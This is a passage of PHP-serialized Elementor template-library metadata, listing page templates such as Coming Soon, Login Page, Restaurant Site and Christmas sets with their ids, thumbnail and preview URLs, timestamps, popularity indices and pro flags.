3\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2017/03/Coming-Soon-3.png\";s:12:\"tmpl_created\";s:10:\"1491207050\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:103:\"https://library.elementor.com/coming-soon-3/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"100\";s:16:\"popularity_index\";s:2:\"91\";s:11:\"trend_index\";s:3:\"179\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:99;a:14:{s:2:\"id\";s:4:\"1249\";s:5:\"title\";s:13:\"Coming Soon 4\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2017/03/Coming-Soon-4.png\";s:12:\"tmpl_created\";s:10:\"1491207380\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:103:\"https://library.elementor.com/coming-soon-4/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"101\";s:16:\"popularity_index\";s:3:\"122\";s:11:\"trend_index\";s:3:\"345\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:100;a:14:{s:2:\"id\";s:4:\"1250\";s:5:\"title\";s:13:\"Coming Soon 5\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2017/03/Coming-Soon-5.png\";s:12:\"tmpl_created\";s:10:\"1491207450\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:103:\"https://library.elementor.com/coming-soon-5/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"102\";s:16:\"popularity_index\";s:2:\"32\";s:11:\"trend_index\";s:2:\"51\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:101;a:14:{s:2:\"id\";s:4:\"1260\";s:5:\"title\";s:13:\"Coming Soon 6\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2017/03/Coming-Soon-6.png\";s:12:\"tmpl_created\";s:10:\"1491207507\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:103:\"https://library.elementor.com/coming-soon-6/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"103\";s:16:\"popularity_index\";s:3:\"121\";s:11:\"trend_index\";s:3:\"294\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:102;a:14:{s:2:\"id\";s:4:\"1261\";s:5:\"title\";s:13:\"Coming Soon 7\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2017/04/Coming-Soon-7.png\";s:12:\"tmpl_created\";s:10:\"1491207584\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:103:\"https://library.elementor.com/coming-soon-7/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"104\";s:16:\"popularity_index\";s:2:\"34\";s:11:\"trend_index\";s:2:\"53\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:103;a:14:{s:2:\"id\";s:4:\"1272\";s:5:\"title\";s:13:\"Coming Soon 8\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2017/03/Coming-Soon-8.png\";s:12:\"tmpl_created\";s:10:\"1491207674\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:103:\"https://library.elementor.com/coming-soon-8/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"105\";s:16:\"popularity_index\";s:2:\"61\";s:11:\"trend_index\";s:3:\"162\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:104;a:14:{s:2:\"id\";s:4:\"1279\";s:5:\"title\";s:13:\"Coming Soon 9\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2017/03/Coming-Soon-9.png\";s:12:\"tmpl_created\";s:10:\"1491207756\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:103:\"https://library.elementor.com/coming-soon-9/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"106\";s:16:\"popularity_index\";s:2:\"40\";s:11:\"trend_index\";s:2:\"88\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:105;a:14:{s:2:\"id\";s:4:\"1745\";s:5:\"title\";s:14:\"Coming Soon 10\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2017/05/login-002.png\";s:12:\"tmpl_created\";s:10:\"1494849745\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:104:\"https://library.elementor.com/coming-soon-10/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"107\";s:16:\"popularity_index\";s:2:\"65\";s:11:\"trend_index\";s:3:\"271\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:106;a:14:{s:2:\"id\";s:4:\"1742\";s:5:\"title\";s:12:\"Login Page 1\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2017/05/login-003.png\";s:12:\"tmpl_created\";s:10:\"1494849744\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:100:\"https://library.elementor.com/login-page/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"108\";s:16:\"popularity_index\";s:3:\"106\";s:11:\"trend_index\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:107;a:14:{s:2:\"id\";s:4:\"1748\";s:5:\"title\";s:12:\"Login Page 2\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2017/05/login-001.png\";s:12:\"tmpl_created\";s:10:\"1494849742\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:102:\"https://library.elementor.com/login-page-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"109\";s:16:\"popularity_index\";s:2:\"63\";s:11:\"trend_index\";s:3:\"176\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:108;a:14:{s:2:\"id\";s:4:\"3963\";s:5:\"title\";s:32:\"Restaurant Site &#8211; Homepage\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/01/R.HomepageThumb.png\";s:12:\"tmpl_created\";s:10:\"1516284821\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/restaurant-site-homepage/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:109:\"[\"bar\",\"cafe\",\"cooking\",\"drink\",\"events\",\"fast food\",\"Food\",\"menu\",\"modern\",\"reservation\",\"Shop\",\"snack bar\"]\";s:10:\"menu_order\";s:3:\"110\";s:16:\"popularity_index\";s:3:\"102\";s:11:\"trend_index\";s:3:\"305\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:109;a:14:{s:2:\"id\";s:4:\"3969\";s:5:\"title\";s:28:\"Restaurant Site &#8211; Menu\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/01/R.MenuThumb.png\";s:12:\"tmpl_created\";s:10:\"1516284829\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:110:\"https://library.elementor.com/restaurant-site-menu/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:109:\"[\"bar\",\"cafe\",\"cooking\",\"drink\",\"events\",\"fast food\",\"Food\",\"menu\",\"modern\",\"reservation\",\"Shop\",\"snack bar\"]\";s:10:\"menu_order\";s:3:\"111\";s:16:\"popularity_index\";s:3:\"147\";s:11:\"trend_index\";s:3:\"265\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:110;a:14:{s:2:\"id\";s:4:\"3966\";s:5:\"title\";s:29:\"Restaurant Site &#8211; About\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2018/01/R.AboutThumb.png.png\";s:12:\"tmpl_created\";s:10:\"1516284839\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/restaurant-site-about/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:109:\"[\"bar\",\"cafe\",\"cooking\",\"drink\",\"events\",\"fast food\",\"Food\",\"menu\",\"modern\",\"reservation\",\"Shop\",\"snack bar\"]\";s:10:\"menu_order\";s:3:\"112\";s:16:\"popularity_index\";s:3:\"124\";s:11:\"trend_index\";s:3:\"243\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:111;a:14:{s:2:\"id\";s:4:\"3972\";s:5:\"title\";s:31:\"Restaurant Site &#8211; Contact\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2018/01/R.ContactThumb.png\";s:12:\"tmpl_created\";s:10:\"1516284847\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:113:\"https://library.elementor.com/restaurant-site-contact/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:109:\"[\"bar\",\"cafe\",\"cooking\",\"drink\",\"events\",\"fast food\",\"Food\",\"menu\",\"modern\",\"reservation\",\"Shop\",\"snack bar\"]\";s:10:\"menu_order\";s:3:\"113\";s:16:\"popularity_index\";s:3:\"136\";s:11:\"trend_index\";s:3:\"309\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:112;a:14:{s:2:\"id\";s:4:\"2080\";s:5:\"title\";s:27:\"Ski Resort &#8211; Homepage\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2017/10/Ski-Resort-Home-Page.png\";s:12:\"tmpl_created\";s:10:\"1508161124\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:109:\"https://library.elementor.com/ski-resort-homepage/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"114\";s:16:\"popularity_index\";s:2:\"90\";s:11:\"trend_index\";s:3:\"227\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:113;a:14:{s:2:\"id\";s:4:\"2088\";s:5:\"title\";s:24:\"Ski Resort &#8211; About\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2017/10/Ski-Resort-About.png\";s:12:\"tmpl_created\";s:10:\"1508161129\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/ski-resort-about/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"115\";s:16:\"popularity_index\";s:3:\"133\";s:11:\"trend_index\";s:3:\"329\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:114;a:14:{s:2:\"id\";s:4:\"2085\";s:5:\"title\";s:27:\"Ski Resort &#8211; Services\";s:9:\"thumbnail\";s:80:\"https://library.elementor.com/wp-content/uploads/2017/10/Ski-Resort-Services.png\";s:12:\"tmpl_created\";s:10:\"1508161134\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:109:\"https://library.elementor.com/ski-resort-services/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"116\";s:16:\"popularity_index\";s:3:\"145\";s:11:\"trend_index\";s:3:\"364\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:115;a:14:{s:2:\"id\";s:4:\"2462\";s:5:\"title\";s:23:\"Architect &#8211; About\";s:9:\"thumbnail\";s:80:\"https://library.elementor.com/wp-content/uploads/2017/10/architect-–-about.png\";s:12:\"tmpl_created\";s:10:\"1508243317\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:105:\"https://library.elementor.com/architect-about/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"117\";s:16:\"popularity_index\";s:3:\"119\";s:11:\"trend_index\";s:3:\"195\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:116;a:14:{s:2:\"id\";s:4:\"2362\";s:5:\"title\";s:26:\"Architect &#8211; Projects\";s:9:\"thumbnail\";s:79:\"https://library.elementor.com/wp-content/uploads/2017/10/Architect-Projects.png\";s:12:\"tmpl_created\";s:10:\"1508243335\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:108:\"https://library.elementor.com/architect-projects/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"118\";s:16:\"popularity_index\";s:3:\"125\";s:11:\"trend_index\";s:3:\"254\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:117;a:14:{s:2:\"id\";s:3:\"614\";s:5:\"title\";s:25:\"Architect &#8211; Contact\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2016/12/architect-contact.jpg\";s:12:\"tmpl_created\";s:10:\"1481549169\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:107:\"https://library.elementor.com/architect-contact/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"119\";s:16:\"popularity_index\";s:2:\"51\";s:11:\"trend_index\";s:3:\"282\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:118;a:14:{s:2:\"id\";s:4:\"2126\";s:5:\"title\";s:37:\"Construction Company &#8211; Homepage\";s:9:\"thumbnail\";s:91:\"https://library.elementor.com/wp-content/uploads/2017/10/Construction-Company-Home-Page.png\";s:12:\"tmpl_created\";s:10:\"1508325849\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/construction-company-homepage/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"120\";s:16:\"popularity_index\";s:2:\"84\";s:11:\"trend_index\";s:3:\"238\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:119;a:14:{s:2:\"id\";s:4:\"2129\";s:5:\"title\";s:34:\"Construction Company &#8211; About\";s:9:\"thumbnail\";s:87:\"https://library.elementor.com/wp-content/uploads/2017/10/Construction-Company-About.png\";s:12:\"tmpl_created\";s:10:\"1508325881\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/construction-company-about/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"121\";s:16:\"popularity_index\";s:3:\"111\";s:11:\"trend_index\";s:3:\"342\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:120;a:14:{s:2:\"id\";s:4:\"2135\";s:5:\"title\";s:36:\"Construction Company &#8211; Contact\";s:9:\"thumbnail\";s:89:\"https://library.elementor.com/wp-content/uploads/2017/10/Construction-Company-Contact.png\";s:12:\"tmpl_created\";s:10:\"1508325922\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:118:\"https://library.elementor.com/construction-company-contact/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"122\";s:16:\"popularity_index\";s:3:\"104\";s:11:\"trend_index\";s:3:\"284\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:121;a:14:{s:2:\"id\";s:4:\"2094\";s:5:\"title\";s:28:\"Plants Shop &#8211; Homepage\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2017/11/Plants-Shop-Home.png\";s:12:\"tmpl_created\";s:10:\"1509621053\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:110:\"https://library.elementor.com/plants-shop-homepage/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"123\";s:16:\"popularity_index\";s:3:\"109\";s:11:\"trend_index\";s:3:\"252\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:122;a:14:{s:2:\"id\";s:4:\"2120\";s:5:\"title\";s:25:\"Plants Shop &#8211; About\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2017/11/Plants-Shop-About.png\";s:12:\"tmpl_created\";s:10:\"1509631820\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:107:\"https://library.elementor.com/plants-shop-about/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"124\";s:16:\"popularity_index\";s:2:\"94\";s:11:\"trend_index\";s:3:\"185\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:123;a:14:{s:2:\"id\";s:4:\"3619\";s:5:\"title\";s:31:\"Snowboard Site &#8211; Homepage\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2017/12/home.png\";s:12:\"tmpl_created\";s:10:\"1513513137\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:113:\"https://library.elementor.com/snowboard-site-homepage/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"125\";s:16:\"popularity_index\";s:3:\"116\";s:11:\"trend_index\";s:3:\"312\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:124;a:14:{s:2:\"id\";s:4:\"3632\";s:5:\"title\";s:31:\"Snowboard Site &#8211; Services\";s:9:\"thumbnail\";s:62:\"https://library.elementor.com/wp-content/uploads/2017/12/2.png\";s:12:\"tmpl_created\";s:10:\"1513513171\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:113:\"https://library.elementor.com/snowboard-site-services/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"126\";s:16:\"popularity_index\";s:3:\"120\";s:11:\"trend_index\";s:3:\"314\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:125;a:14:{s:2:\"id\";s:4:\"3626\";s:5:\"title\";s:30:\"Snowboard Site &#8211; Contact\";s:9:\"thumbnail\";s:62:\"https://library.elementor.com/wp-content/uploads/2017/12/3.png\";s:12:\"tmpl_created\";s:10:\"1513513193\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/snowboard-site-contact/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"127\";s:16:\"popularity_index\";s:3:\"105\";s:11:\"trend_index\";s:3:\"231\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:126;a:14:{s:2:\"id\";s:4:\"3153\";s:5:\"title\";s:14:\"Halloween Pack\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2017/10/halloween.png\";s:12:\"tmpl_created\";s:10:\"1508950132\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:104:\"https://library.elementor.com/halloween-pack/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"128\";s:16:\"popularity_index\";s:3:\"137\";s:11:\"trend_index\";s:3:\"334\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:127;a:14:{s:2:\"id\";s:4:\"3338\";s:5:\"title\";s:31:\"Black Friday &#8211; Nature Set\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2017/11/black-friday-1.png\";s:12:\"tmpl_created\";s:10:\"1511203351\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:113:\"https://library.elementor.com/black-friday-nature-set/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"129\";s:16:\"popularity_index\";s:3:\"131\";s:11:\"trend_index\";s:3:\"352\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:128;a:14:{s:2:\"id\";s:4:\"3339\";s:5:\"title\";s:35:\"Black Friday &#8211; Pop-Styled Set\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2017/11/black-friday-2.png\";s:12:\"tmpl_created\";s:10:\"1511203636\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/black-friday-pop-styled-set/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"130\";s:16:\"popularity_index\";s:3:\"103\";s:11:\"trend_index\";s:3:\"240\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:129;a:14:{s:2:\"id\";s:4:\"3335\";s:5:\"title\";s:31:\"Black Friday &#8211; Retail Set\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2017/11/black-friday-4.png\";s:12:\"tmpl_created\";s:10:\"1511203246\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:113:\"https://library.elementor.com/black-friday-retail-set/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"131\";s:16:\"popularity_index\";s:3:\"115\";s:11:\"trend_index\";s:3:\"315\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:130;a:14:{s:2:\"id\";s:4:\"3340\";s:5:\"title\";s:41:\"Black Friday &#8211; Software Product Set\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2017/11/black-friday-3.png\";s:12:\"tmpl_created\";s:10:\"1511203713\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:123:\"https://library.elementor.com/black-friday-software-product-set/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"132\";s:16:\"popularity_index\";s:3:\"114\";s:11:\"trend_index\";s:3:\"343\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:131;a:14:{s:2:\"id\";s:4:\"3517\";s:5:\"title\";s:27:\"Christmas &#8211; Gift Shop\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2017/12/XmasThumb.png\";s:12:\"tmpl_created\";s:10:\"1513877937\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:109:\"https://library.elementor.com/christmas-gift-shop/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"133\";s:16:\"popularity_index\";s:3:\"158\";s:11:\"trend_index\";s:3:\"359\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:132;a:14:{s:2:\"id\";s:4:\"3734\";s:5:\"title\";s:28:\"Christmas &#8211; Car Agency\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2017/12/cover-lib-v3.png\";s:12:\"tmpl_created\";s:10:\"1514197794\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:110:\"https://library.elementor.com/christmas-car-agency/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"134\";s:16:\"popularity_index\";s:3:\"161\";s:11:\"trend_index\";s:3:\"335\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:133;a:14:{s:2:\"id\";s:4:\"3764\";s:5:\"title\";s:33:\"Christmas &#8211; Interior Design\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2017/12/cover-lib-v6.png\";s:12:\"tmpl_created\";s:10:\"1514198234\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/christmas-interior-design/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"135\";s:16:\"popularity_index\";s:3:\"157\";s:11:\"trend_index\";s:3:\"276\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:134;a:14:{s:2:\"id\";s:4:\"3565\";s:5:\"title\";s:27:\"Christmas &#8211; Tree Shop\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2017/12/XmasTreeThumb.png\";s:12:\"tmpl_created\";s:10:\"1514204382\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:109:\"https://library.elementor.com/christmas-tree-shop/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"136\";s:16:\"popularity_index\";s:3:\"150\";s:11:\"trend_index\";s:3:\"308\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:135;a:14:{s:2:\"id\";s:4:\"3862\";s:5:\"title\";s:35:\"Christmas &#8211; Design 